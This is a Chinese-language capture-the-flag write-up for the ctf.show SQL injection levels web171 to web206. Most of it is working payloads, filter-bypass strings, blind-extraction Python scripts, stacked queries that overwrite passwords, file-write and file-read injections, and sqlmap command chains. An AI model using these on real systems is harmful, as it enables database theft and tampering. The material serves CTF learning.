Bootstrap

ctf.show的SQL注入(web171-web253)

web171

注入学习

image-20220326215919454

$sql = "select username,password from user where username !='flag' and id = '".$_GET['id']."' limit 1;";

象征性测试下闭合方式

1	正常
1'	异常
1"	正常

说明是单引号闭合,测试字段数,这里注意使用%23哦

1' order by 3%23	正常
1' order by 4%23	异常

说明三个,查回显地方

1' union select 1,2,3%23

image-20220326220256430

1' union select 1,database(),3%23

image-20220326220315862

爆数据库名

1'union select 1,group_concat(schema_name),3 from information_schema.schemata%23

image-20220326220443697

爆表名

-1'union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()%23

image-20220326220540113

爆字段名

-1'union select 1,group_concat(column_name),3 from information_schema.columns where table_name='ctfshow_user'%23

image-20220327101643682

-1'union select 1,group_concat(username,password),3 from ctfshow_user%23

image-20220327101732815

更简单的

-1' or 1%23

image-20220330134534509

$sql = "select username,password from user where username !='flag' and id = '-1' or 1%23' limit 1;";

web172

image-20220330133530883

//拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user2 where username !='flag' and id = '".$_GET['id']."' limit 1;";

//检查结果是否有flag
    if($row->username!=='flag'){
      $ret['msg']='查询成功';
    }  
字段
1' order by 3%23	异常
1' order by 2%23	正常

数据库
1' union select 1,database()%23
1'union select 1,group_concat(schema_name) from information_schema.schemata%23

表名
-1'union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()%23	#有两张表,第二张是这关的

字段名
-1'union select 1,group_concat(column_name) from information_schema.columns where table_name='ctfshow_user'%23

数据
-1'union select 1,group_concat(username,password) from ctfshow_user2%23

新学的base64加密

0' union select 1,to_base64(password) from ctfshow_user2 where username="flag"%23

image-20220330135800134

web173

image-20220407094914986

//拼接sql语句查找指定ID用户
$sql = "select id,username,password from ctfshow_user3 where username !='flag' and id = '".$_GET['id']."' limit 1;";

//检查结果是否有flag
    if(!preg_match('/flag/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }

与上面差不多,换一个函数

0' union select 1,hex(password),3 from ctfshow_user3 where username="flag"%23

image-20220407095103698

web174

image-20220407095244739

/拼接sql语句查找指定ID用户
$sql = "select username,password from ctfshow_user4 where username !='flag' and id = '".$_GET['id']."' limit 1;";
sel
//检查结果是否有flag
    if(!preg_match('/flag|[0-9]/i', json_encode($ret))){
      $ret['msg']='查询成功';
    }

这里返回一般不让有flag和数字,那么我们想办法替换一下,替换的思路将1-0数字用q~p替换,但本来的flag中一定也会有一些小写字母,这样的话就没办法分辨那个是原本的字母哪个是替换出来的。所以为了避免这个问题,将password首先hex一下,因为hex()函数的返回值中字母都是大写的,所以我们返回结果中的小写字母就是原来的数字,而大写字母就是原本的字符。

1' union select 'q',(select replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(hex(password),'1','q'),'2','w'),'3','e'),'4','r'),'5','t'),'6','y'),'7','u'),'8','i'),'9','o'),'0','p') from ctfshow_user4 where username='flag')--+

image-20220407095715741

在自己替换一下

盲注测试一下下

抓包发现向这个页面请求的数据

image-20220407102847062

1' and length(database())>0%23	

image-20220407103005812

1' and length(database())=0%23	

image-20220407103025956

也就是说如果后面为真就返回admin,如果后面为假就不返回admin

get有回显布尔无空格和逗号的脚本

#payload = 1'&&length((select(password)from(ctfshow_user4)where(id=26)))>{mid}#
def get_pwd_len(url):
    head = 1
    tail = 100
    ans = 0
    while head < tail:
        mid = (head + tail ) >> 1
        payload = f"1'&&length((select(password)from(ctfshow_user4)where(id=26)))>{mid}#"
        # print(uname)
        param = {
            'id': payload,
            'page': '1',
            'limit': '10'
        }
        res = requests.get(url=url,params=param)
        if "admin" in res.text:
            head = mid + 1
            ans = mid + 1
        else:
            tail = mid
    print(ans)

        # passwd长度为:45
url="http://c0fd21f5-b919-4d9c-aac8-de4d325b3a8b.challenge.ctf.show/api/v4.php"
get_pwd_len(url)

#payload = 1'&&ascii(substr((reverse(substr((select(password)from(ctfshow_user4)where(id=26))from({i}))))from({j})))>{mid}#
def get_pwd(url):
    ans = ""
    for i in range(1, 46):
        # print(i)
        j = 46 - i
        # print(j)
        head = 32
        tail = 127
        while head <tail:
            mid = (head + tail) >> 1 #>>是位移运算符 右移一位就是除以二
            payload = f"1'&&ascii(substr((reverse(substr((select(password)from(ctfshow_user4)where(id=26))from({i}))))from({j})))>{mid}#"
            # print(uname)
            param = {
                'id': payload,
                'page': '1',
                'limit': '10'
            }
            res = requests.get(url=url,params=param)
            # print(res.text)
            if "admin" in res.text:
                head = mid + 1
            else:
                tail = mid
        if head != 32:
            ans += chr(head)
        else:
            break
        print(ans)
url="http://c0fd21f5-b919-4d9c-aac8-de4d325b3a8b.challenge.ctf.show/api/v4.php"
get_pwd(url)

除了盲注还可以写文件

/api/v4.php?id=1' union select 1,password from ctfshow_user4 into outfile '/var/www/html/1.txt'--+&page=1&limit=10

image-20220407130358634

web175

image-20220407124216316

这次是直接没有回显了

get时间盲注无空格和逗号的脚本

稍微修改一下

import requests
def get_pwd_len(url):
    head = 1
    tail = 100
    ans = 0
    while head < tail:
        mid = (head + tail ) >> 1
        payload = f"1'&&if(length((select(password)from(ctfshow_user5)where(id=26)))>{mid},sleep(2),0)#"
        # print(uname)
        param = {
            'id': payload,
            'page': '1',
            'limit': '10'
        }
        res = requests.get(url=url,params=param)
        try:
            r = requests.get(url,params=param,timeout=0.5)
            tail = mid
            ans = mid
        except Exception as e :
            head = mid +1
    print(ans)

        # passwd长度为:45
url="http://c7c6c7b5-e27e-46b5-ac09-66d7f0ede948.challenge.ctf.show/api/v5.php"
get_pwd_len(url)


def get_pwd(url):
    ans = ""
    for i in range(1, 46):
        # print(i)
        j = 46 - i
        # print(j)
        head = 32
        tail = 127
        while head <tail:
            mid = (head + tail) >> 1 #>>是位移运算符 右移一位就是除以二
            payload = f"1'&&if(ascii(substr((reverse(substr((select(password)from(ctfshow_user5)where(id=26))from({i}))))from({j})))>{mid},sleep(2),0)#"
            # print(uname)
            param = {
                'id': payload,
                'page': '1',
                'limit': '10'
            }
            try:
                res = requests.get(url=url,params=param,timeout=0.5)
                tail = mid
            except Exception as e:
                head = mid + 1

        if head != 32:
            ans += chr(head)
        else:
            break
        print(ans)
url="http://c7c6c7b5-e27e-46b5-ac09-66d7f0ede948.challenge.ctf.show/api/v5.php"
get_pwd(url)

这里有逗号,等研究研究在试试能不能去掉逗号

这里当然也可以写文件

/api/v5.php?id=1' union select 1,password from ctfshow_user5 into outfile '/var/www/html/1.txt'--+&page=1&limit=10

web176

image-20220407130600142

-1' or 1%23

image-20220407130612382

不知道过滤了啥

这里之前的不可以,但是大小写可以绕过

-1'uNion seleCt 1,groUp_concAt(username,password),3 frOm ctfshow_user%23

image-20220407130913425

web177-179

image-20220407131027613

空格的代替

-1'%09or%091%23	TAB水平
-1'%0aor%0a1%23	新建一行
-1'%0cor%0c1%23	新建一页
-1'%0dor%0d1%23	return功能
-1'%0bor%0b1%23	TAB(垂直)
%a0 			空格 这里不行

注释

-1'union/**/select/**/1,group_concat(username,password),3/**/from/**/ctfshow_user%23

括号

我也不会,自己研究怎么加括号吧

-1'union(select(1),(group_concat(username,password)),(3)from(ctfshow_user))%23

反引号

我不懂但是可以实现

-1'union/**/select`id`,`username`,`password`from`ctfshow_user`%23

image-20220407131136762

web180-183

image-20220407135553899

过滤注释符与空格

联合注入好像无法实现,反正我不会,如果没过滤其他空格可以实现

-1'union%0cselect(1),(group_concat(username,password)),(3)from(ctfshow_user)where(1)and'1
-1'or(id=26)and'1'='1

image-20220407140553761

web184

image-20220407141724604

//拼接sql语句查找指定ID用户
  $sql = "select count(pass) from ".$_POST['tableName'].";";
  
  //对传入的参数进行了过滤
  function waf($str){
    return preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\#|\x23|file|\=|or|\x7c|select|and|flag|into/i', $str);
  }
  
//返回用户表的记录总数
      $user_count = 0;

regexp匹配like通配pwd

import requests

def post_pwd(url):
    dic=r'{flqazwsxedcrvtgbyhnujmikolp-0123456789}'
    ans =''
    for i in range(1,46):
        for j in  dic:
            #flag="ctfshow{"
            #payload = f"(ctfshow_user)where(pass)like'{flag+j}%'
            payload =f"(ctfshow_user)where(substr(pass,{i},1))regexp('{j}')"
            data = {
                'tableName':payload
            }
            r = requests.post(url,data=data)
            if r.text.find("$user_count = 1;") > 0:
                ans += j
                print(ans)
                break

url = 'http://a4c677e5-0ca4-46f8-85da-961e108b532b.challenge.ctf.show/select-waf.php'
post_pwd(url)

web184

 Author:feng
import requests

url="http://419f0650-7493-4fa7-81fe-82e04b0b6b7c.challenge.ctf.show/select-waf.php"
flag="ctfshow{"

def str_to_hex(s):
    return ''.join([hex(ord(c)).replace('0x','') for c in s])
for i in range(0,100):
    for j in "0123456789abcdefghijklmnopqrstuvwxyz-{}":
        data={
#'tableName':"ctfshow_user a inner join ctfshow_user b on b.pass like {}".format("0x"+str_to_hex(flag+j+"%"))
            'tableName':f"ctfshow_user group by pass having pass like {'0x'+str_to_hex(flag+j+'%')}"
        }
        r=requests.post(url=url,data=data).text
        if "$user_count = 1" in r:
            flag+=j
            print(flag)
            if j=='}':
                exit()
            break

HAVING语句通常与GROUP BY语句联合使用,用来过滤由GROUP BY语句返回的记录集。
HAVING语句的存在弥补了WHERE关键字不能与聚合函数联合使用的不足。

 Author:Y4tacker
import requests

url = "http://419f0650-7493-4fa7-81fe-82e04b0b6b7c.challenge.ctf.show/select-waf.php"

flag = 'ctfshow{'
for i in range(45):
    if i <= 8:
        continue
    for  j in range(127):
        data = {
            "tableName": f"ctfshow_user as a right join ctfshow_user as b on (substr(b.pass,{i},1)regexp(char({j})))"
        }
        r = requests.post(url,data=data)
        if r.text.find("$user_count = 43;")>0:
            if chr(j) != ".":
                flag += chr(j)
                print(flag.lower())
                if chr(j) == "}":
                    exit(0)
                break

RIGHT JOIN等同于RIGHT OUTER JOIN,右外连接,不满足ON条件的会保留右边那张表的数据,左边表数据直接显示NULL

web185-186

数字的表示哦

image-20220407150732592

 Author:Y4tacker
import requests

url = "http://bdd55ead-f197-4ec4-b304-8bf0dd687c8d.challenge.ctf.show/select-waf.php"

flag = 'ctfshow{'


def createNum(n):
    num = 'true'
    if n == 1:
        return 'true'
    else:
        for i in range(n - 1):
            num += "+true"
    return num


for i in range(45):
    if i <= 8:
        continue
    for j in range(127):
        data = {
            "tableName": f"ctfshow_user as a right join ctfshow_user as b on (substr(b.pass,{createNum(i)},{createNum(1)})regexp(char({createNum(j)})))"
        }
        r = requests.post(url, data=data)
        if r.text.find("$user_count = 43;") > 0:
            if chr(j) != ".":
                flag += chr(j)

                print(flag.lower())
                if chr(j) == "}":
                    exit(0)
                break

web187

image-20220407153242084

image-20220407153406158

pwd的md5

md5(string,raw)     
参数	描述
string	必需。要计算的字符串。
raw	
可选。
    默认不写为FALSE。32位16进制的字符串
    TRUE。16位原始二进制格式的字符串

这里需要注意的是,当raw项为true时,返回的这个原始二进制不是普通的二进制(0,1),而是 'or’6\xc9]\x99\xe9!r,\xf9\xedb\x1c 这种。

上面的’ffifdyop‘字符串对应的16位原始二进制的字符串就是” 'or’6\xc9]\x99\xe9!r,\xf9\xedb\x1c “ 。 ’ \ ‘后面的3个字符连同’ \ '算一个字符,比如’ \xc9 ‘,所以上述一共16个。当然,像’ \xc9 ‘这种字符会显示乱码。

这里32位的16进制的字符串,两个一组就是上面的16位二进制的字符串。比如27,这是16进制的,先要转化为10进制的,就是39,39在ASC码表里面就是’ ’ ‘字符。6f就是对应‘ o ’。

   然后我们得到的sql语句就是 SELECT * FROM admin WHERE username = 'admin' and password = ''or'6�]��!r,��b'

   为什么password = ''or'6�]��!r,��b'的返回值会是true呢,因为or后面的单引号里面的字符串(6�]��!r,��b),是数字开头的。当然不能以0开头。(我不知道在数据库里面查询的时候,�这种会不会显示)

   这里引用一篇文章,连接在下面,里面的原话“a string starting with a 1 is cast as an integer when used as a boolean.“

  在mysql里面,在用作布尔型判断时,以1开头的字符串会被当做整型数。要注意的是这种情况是必须要有单引号括起来的,比如password=‘xxx’ or ‘1xxxxxxxxx’,那么就相当于password=‘xxx’ or 1  ,也就相当于password=‘xxx’ or true,所以返回值就是true。当然在我后来测试中发现,不只是1开头,只要是数字开头都是可以的。

   当然如果只有数字的话,就不需要单引号,比如password=‘xxx’ or 1,那么返回值也是true。(xxx指代任意字符)

 所以到这里为止,就完成了sql注入。同时要注意的是,这种sql语句,在mysql里面是可以行得通的,但是在oracle数据库里面这样的语句是有语法错误的。

   所以回过头来为什么ffifdyop就是答案,因为ffifdyop的md5的原始二进制字符串里面有‘or’6这一部分的字符。那么进一步思考这个单引号是否是必要的,这两个单引号是为了与原有的语句的单引号配对。所以我们理解了这个sql注入的原理,那么就明白了我们需要怎样的字符串。

web188

image-20220407153535740

这条语句可以查出所有数据

SELECT * FROM users where username = 1<1 and password = 0
SELECT * FROM users where username = 0 and password = 0

在where username=0这样的查询中,因为username都是字符串,在mysql中字符串与数字进行比较适合,以字母开头的字符串都会转换成数字0,因此这个where可以把所有以字母开头的数据查出来

if($row['pass']==intval($password)){

这里的查询密码是弱类型,查出来的passwd也是以字母开头的,所以password=0可以成功弱类型比较

这样也可以查到

select * from referers where referer = 'http://127.0.0.1/sqlilabs/Less-19/' and referer = 1;

image-20220407154415679

 SELECT password FROM users where username = 1||1 and password = 12;

image-20220407154509937

username=1<1&password=0
username=0&password=0
username=1||1&password=0

web189

image-20220407155009165

image-20220407155019582

load_file()函数盲注文件

 Author:feng
import requests

url="http://356200d4-1b3a-4eff-818f-9c21ccbf8214.challenge.ctf.show/api/index.php"

flag="ctfshow{"
for i in range(0,100):
    for j in "0123456789abcdefghijklmnopqrstuvwxyz-{}":
        payload="if((load_file('/var/www/html/api/index.php'))regexp('{}'),0,1)".format(flag+j)
        data={
            'username':payload,
            'password':1
        }
        r=requests.post(url=url,data=data)
        if "\\u5bc6\\u7801\\u9519\\u8bef" in r.text:
            flag+=j
            print(flag)
            if j=='}':
                exit()
            break

# Author:Y4tacker
import requests

url = "http://3d54cb5b-69e8-4592-85b3-662e3aa01ea5.chall.ctf.show/api/"


def getFlagIndex():
    head = 1
    tail = 300
    while head < tail:
        mid = (head + tail) >> 1
        data = {
            'username': "if(locate('flag{'," + "load_file('/var/www/html/api/index.php'))>{0},0,1)".format(str(mid)),
            'password': '1'
        }
        r = requests.post(url, data=data)
        if "密码错误" == r.json()['msg']:
            head = mid + 1
        else:
            tail = mid
    return mid


def getFlag(num):
    i = int(num)
    result = ""
    while 1:
        head = 32
        tail = 127

        i = i + 1
        while head < tail:
            mid = (head + tail) >> 1
            data = {
                'username': "if(ascii(substr(load_file('/var/www/html/api/index.php'),{0},1))>{1},0,1)".format(str(i),
                                                                                                               str(
                                                                                                                   mid)),
                'password': '1'
            }
            r = requests.post(url, data=data)
            if "密码错误" == r.json()['msg']:
                head = mid + 1
            else:
                tail = mid
            mid += 1
        if head != 32:
            result += chr(head)
            print(result)
        else:
            break


if __name__ == '__main__':
    index = getFlagIndex()
    getFlag(index)


web190

无过滤盲注

 Author:Y4tacker
import requests

url = "http://87a2c8d4-69ca-4617-b96c-ce3601bdc1a6.challenge.ctf.show/api/"

result = ""
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # 查数据库 ctfshow_fl0g
        #payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # 查字段 id,f1ag
        #payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"
        # 查flag
        payload = "select group_concat(f1ag) from ctfshow_fl0g"
        data = {
            'username': f"admin' and if(ascii(substr(({payload}),{i},1))>{mid},1,2)='1",
            'password': '1'
        }

        r = requests.post(url,data=data)
        if "密码错误"  == r.json()['msg']:
            head = mid + 1
        else:
            tail = mid

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)



web191

ord函数盲注

 Author:Y4tacker
import requests

url = "http://646c4493-3a66-407e-8ddf-c59355418a23.challenge.ctf.show/api/"

result = ""
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        # 查数据库 ctfshow_fl0g
        #payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # 查字段 f1ag
        #payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"
        # 查flag
        payload = "select group_concat(f1ag) from ctfshow_fl0g"
        data = {
            'username': f"admin' and if(ord(substr(({payload}),{i},1))>{mid},1,2)='1",
            'password': '1'
        }

        r = requests.post(url,data=data)
        if "密码错误"  == r.json()['msg']:
            head = mid + 1
        else:
            # print(r.text)
            tail = mid

    last = result

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)



爆破出来可能是大写的

主要还是一个地方,就是一般布尔注入都会用改成ascii码值进行比较,正常字符串的比较不也是挨个位置比较ascii码吗?为什么还要多费事的去加一层ascii,这个的原因就是mysql进行字符串比较的时候,是按大写比较的,比如"1ab2AAD",比较的时候是"1AB2AAD",所以才会加上那一层ascii,这题ascii被ban了,直接字符串比较的话肯定爆出来的都是大写了。

web192

过滤ord和ascii函数

 Author:feng
import requests
from time import time

url='http://00b9416c-a0a8-490b-b48b-b2ace6ec42b2.chall.ctf.show:8080/api/index.php'

flag=''
for i in range(1,100):
    length=len(flag)
    min=32
    max=128
    while 1:
        j=min+(max-min)//2
        if min==j:
            flag+=chr(j)
            print(flag.lower())
            if chr(j)==" ":
                exit()
            break

        payload="' or if(substr((select group_concat(f1ag) from ctfshow_fl0g),{},1)<'{}',1,0)-- -".format(i,chr(j))

        data={
            'username':payload,
            'password':1
        }
        r=requests.post(url=url,data=data).text
        #print(r)
        if r"\u5bc6\u7801\u9519\u8bef" in r:
            max=j
        else :
            min=j


 Author:Y4tacker
import requests
import string

url = "http://2c0073f7-8662-4a12-a742-f17e1818ed0a.chall.ctf.show/api/"
flagstr=" _{}-" + string.ascii_lowercase + string.digits
flag = ''
for i in range(1,45):
    for j in flagstr:
        payload = f"admin' and if(substr((select group_concat(f1ag) from ctfshow_fl0g),{i},1)regexp('{j}'),1,2)='1"
        data = {
            'username': payload,
            'password': '1'
        }
        r = requests.post(url, data=data)
        if "密码错误" == r.json()['msg']:
            flag += j
            print(flag)
            if "}" == j:
                exit(0)
            break

web193

过滤sustr

 Author:feng
import requests

url='http://fc1e9e65-4116-4635-aebc-05e37fef775f.challenge.ctf.show/api/'
flag=""
for i in range(0,100):
    for j in "0123456789abcdefghijklmnopqrstuvwxyz-,{}_":
        #payload="' or if((select group_concat(table_name) from information_schema.tables where table_schema=database()) like '{}',1,0)-- -".format(flag+j+"%")
        #payload="' or if((select group_concat(column_name) from information_schema.columns where table_name='ctfshow_flxg') like '{}',1,0)-- -".format(flag+j+"%")
        payload="' or if((select group_concat(f1ag) from ctfshow_flxg) like '{}',1,0)-- -".format(flag+j+"%")

        data={
            'username':payload,
            'password':1
        }
        #print(payload)
        r=requests.post(url=url,data=data)
        #print(payload)
        if r"\u5bc6\u7801\u9519\u8bef" in r.text:
            flag+=j
            print(flag)
            if j=='}':
                exit()
            break

 Author:Y4tacker
import requests
import string

url = "http://fc1e9e65-4116-4635-aebc-05e37fef775f.challenge.ctf.show/api/"
flagstr="0123456789abcdefghijklmnopqrstuvwxyz-,{}_"
flag = ''

for i in range(1,45):
    for j in flagstr:
        payload = "select group_concat(table_name) from information_schema.tables where table_schema=database()"
        # 查字段 f1ag
        # payload = "select group_concat(column_name) from information_schema.columns where table_name='ctfshow_fl0g'"
        #payload = "(select group_concat(f1ag) from ctfshow_fl0g)"
        payload = f"admin' and if(({payload})regexp('{flag +j}'),1,2)='1"
        print(payload)
        data = {
            'username': payload,
            'password': '1'
        }
        r = requests.post(url, data=data)
        if "密码错误" == r.json()['msg']:
            flag += j
            print(flag)
            if "}" == j:
                exit(0)
            break

web194

locat()正则注入

 Author:Y4tacker
import requests
# 应该还可以用instr等函数,LOCATE、POSITION、INSTR、FIND_IN_SET、IN、LIKE
url = "http://dee436de-268a-408e-b66a-88b4c972e5f5.chall.ctf.show/api/"
final = ""
stttr = "flag{}-_1234567890qwertyuiopsdhjkzxcvbnm"
for i in range(1,45):
    for j in stttr:
        final += j
        # 查表名-ctfshow_flxg
        # payload = f"admin' and if(locate('{final}',(select table_name from information_schema.tables where table_schema=database() limit 0,1))=1,1,2)='1"
        # 查字段-f1ag
        # payload = f"admin' and if(locate('{final}',(select column_name from information_schema.columns where table_name='ctfshow_flxg' limit 1,1))=1,1,2)='1"
        payload = f"admin' and if(locate('{final}',(select f1ag from ctfshow_flxg limit 0,1))=1,1,2)='1"
        data = {
            'username': payload,
            'password': '1'
        }
        r = requests.post(url,data=data)
        if "密码错误" == r.json()['msg']:
            print(final)
        else:
            final = final[:-1]


import requests
import string

url = "http://2c0073f7-8662-4a12-a742-f17e1818ed0a.chall.ctf.show/api/"
flagstr=" _{}-" + string.ascii_lowercase + string.digits
flag = ''
z = 'flag'
for i in range(1,45):
    for j in flagstr:
        payload = f"admin' and if((select group_concat(f1ag) from ctfshow_fl0g)regexp('{j}'),1,2)='1"
        data = {
            'username': payload,
            'password': '1'
        }
        r = requests.post(url, data=data)
        if "密码错误" == r.json()['msg']:
            flag += j
            print(flag)
            if "}" == j:
                exit(0)
            break

web195

update堆叠注入

把所有的密码都改为111,之后登录就好

0x61646d696e;update`ctfshow_user`set`pass`=0x313131;
# 至于为什么非得用十六进制登录,是因为下面这个没有字符串单引号包围
sql = "select pass from ctfshow_user where username = {$username};";

image-20220407180508467

web196

image-20220407180601416

  //TODO:感觉少了个啥,奇怪,不会又双叒叕被一血了吧
  if(preg_match('/ |\*|\x09|\x0a|\x0b|\x0c|\x0d|\xa0|\x00|\#|\x23|\'|\"|select|union|or|and|\x26|\x7c|file|into/i', $username)){
    $ret['msg']='用户名非法';
    die(json_encode($ret));
  }

可能是过滤错了吧

1;select(1)

image-20220407180656002

web197-198

alter更改列名堆叠注入

利用alter更改列名。一开始想着把username更改为pass,然后查出来的就是字符串用户名,和数字0进行弱类型比较就可以了,但是实际尝试发现不行,看了一下发现这题没有检查传入的password是不是数字,而且没有用intval对password进行处理,所以这样不行,那就把id改成pass,然后爆破id就可以了。

1;alter table `ctfshow_user` change `pass` `feng` varchar(255); alter table `ctfshow_user` change `id` `pass` varchar(255)
 Author:Y4tacker
import requests

url = "http://b126bc7c-2b32-461d-9520-30d5baf7a152.chall.ctf.show/api/"
for i in range(100):
    if i == 0:
        data = {
            'username': '0;alter table ctfshow_user change column `pass` `ppp` varchar(255);alter table ctfshow_user '
                        'change column `id` `pass` varchar(255);alter table ctfshow_user change column `ppp` `id` '
                        'varchar(255);',
            'password': f'{i}'
        }
        r = requests.post(url, data=data)
    data = {
        'username': '0x61646d696e',
        'password': f'{i}'
    }
    r = requests.post(url, data=data)
    if "登陆成功" in r.json()['msg']:
        print(r.json()['msg'])
        break


#登陆成功 flag is ctfshow{1e8cd464-117c-4863-a8ea-0e7b83d3d9fe}

web199-200

堆叠登录

1;show tables
ctfshow_user

show tables;会显示表名,也就是ctfshow_user那么这个时候会将查出来的这个值当成密码,也就是密码为ctfshow_user

image-20220407182514272

web201

改referer

探测注入点
python sqlmap.py -u http://46015307-d076-4924-bdc0-2d6a2a8bfa53.challenge.ctf.show/api/?id=1 --referer="ctf.show" --batch
数据库
python sqlmap.py -u http://46015307-d076-4924-bdc0-2d6a2a8bfa53.challenge.ctf.show/api/?id=1 --referer="ctf.show" --dbs --batch
表名
python sqlmap.py -u http://46015307-d076-4924-bdc0-2d6a2a8bfa53.challenge.ctf.show/api/?id=1 --referer="ctf.show" -D "ctfshow_web" --tables --batch
字段名
python sqlmap.py -u http://46015307-d076-4924-bdc0-2d6a2a8bfa53.challenge.ctf.show/api/?id=1 --referer="ctf.show" -D "ctfshow_web" -T ctfshow_user --columns --batch
数据
python sqlmap.py -u http://46015307-d076-4924-bdc0-2d6a2a8bfa53.challenge.ctf.show/api/?id=1 --referer="ctf.show" -D "ctfshow_web" -T ctfshow_user -C "pass" --dump --batch

web202

post注入

注入点
python sqlmap.py -u http://3c25a99c-6b53-4c1f-8780-ca8fa60d3d76.challenge.ctf.show/api/ --referer="ctf.show" --data="id=1" --batch
数据库
python sqlmap.py -u http://3c25a99c-6b53-4c1f-8780-ca8fa60d3d76.challenge.ctf.show/api/ --referer="ctf.show" --data="id=1" --dbs --batch
表名
python sqlmap.py -u http://3c25a99c-6b53-4c1f-8780-ca8fa60d3d76.challenge.ctf.show/api/ --referer="ctf.show" --data="id=1" -D ctfshow_web --tables --batch
字段名
python sqlmap.py -u http://3c25a99c-6b53-4c1f-8780-ca8fa60d3d76.challenge.ctf.show/api/ --referer="ctf.show" --data="id=1" -D ctfshow_web -T ctfshow_user --columns --batch
数据
python sqlmap.py -u http://3c25a99c-6b53-4c1f-8780-ca8fa60d3d76.challenge.ctf.show/api/ --referer="ctf.show" --data="id=1" -D ctfshow_web -T ctfshow_user -C pass --dump --batch

web203

请求方式

必须要加index.php

注入点
python sqlmap.py -u http://481cfdd7-9ef9-4c5d-8aff-e2e9bb555406.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --batch
数据库
python sqlmap.py -u http://481cfdd7-9ef9-4c5d-8aff-e2e9bb555406.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --dbs --batch
表名
python sqlmap.py -u http://481cfdd7-9ef9-4c5d-8aff-e2e9bb555406.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" -D ctfshow_web --tables --batch
字段名
python sqlmap.py -u http://481cfdd7-9ef9-4c5d-8aff-e2e9bb555406.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" -D ctfshow_web -T ctfshow_user --columns --batch
数据
python sqlmap.py -u http://481cfdd7-9ef9-4c5d-8aff-e2e9bb555406.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" -D ctfshow_web -T ctfshow_user -C pass --dump --batch

web204

改cookie

python sqlmap.py -u http://4d60760f-5063-4ed9-9221-e282903a6cd9.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --cookie="PHPSESSID=eq5fptfudtbh83i0c0cefg944a; ctfshow=0b535f51ad8cd475e68035ffa3f7fdf7" -D ctfshow_web -T ctfshow_user -C pass --dump --batch

web205

访问安全链接

可以发现查询数据时先去访问了getToken.php,接着才是查询数据

image-20220407200618827

--safe-url 设置在测试目标地址前访问的安全链接
 --safe-freq 设置两次注入测试前访问安全链接的次数
注入点
python sqlmap.py -u http://28de1ae5-a156-44ae-8afb-d42eececfb1f.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://28de1ae5-a156-44ae-8afb-d42eececfb1f.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch
数据库
python sqlmap.py -u http://28de1ae5-a156-44ae-8afb-d42eececfb1f.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://28de1ae5-a156-44ae-8afb-d42eececfb1f.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --dbs
表名
python sqlmap.py -u http://28de1ae5-a156-44ae-8afb-d42eececfb1f.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://28de1ae5-a156-44ae-8afb-d42eececfb1f.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch -D ctfshow_web --tables
字段名
python sqlmap.py -u http://28de1ae5-a156-44ae-8afb-d42eececfb1f.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://28de1ae5-a156-44ae-8afb-d42eececfb1f.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch -D ctfshow_web -T ctfshow_flax --columns
数据
python sqlmap.py -u http://28de1ae5-a156-44ae-8afb-d42eececfb1f.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://28de1ae5-a156-44ae-8afb-d42eececfb1f.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch -D ctfshow_web -T ctfshow_flax -C flagx --dump

web206

注入点
python sqlmap.py -u http://f943ef60-0a50-452c-bc6d-f4f2d780b509.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://f943ef60-0a50-452c-bc6d-f4f2d780b509.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch
数据库
python sqlmap.py -u http://f943ef60-0a50-452c-bc6d-f4f2d780b509.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://f943ef60-0a50-452c-bc6d-f4f2d780b509.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch --dbs
表名
python sqlmap.py -u http://f943ef60-0a50-452c-bc6d-f4f2d780b509.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://f943ef60-0a50-452c-bc6d-f4f2d780b509.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch -D ctfshow_web --tables
字段名
python sqlmap.py -u http://f943ef60-0a50-452c-bc6d-f4f2d780b509.challenge.ctf.show/api/index.php --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --safe-url="http://f943ef60-0a50-452c-bc6d-f4f2d780b509.challenge.ctf.show/api/getToken.php" --safe-freq=1 --batch -D ctfshow_web -T ctfshow_flaxc --columns
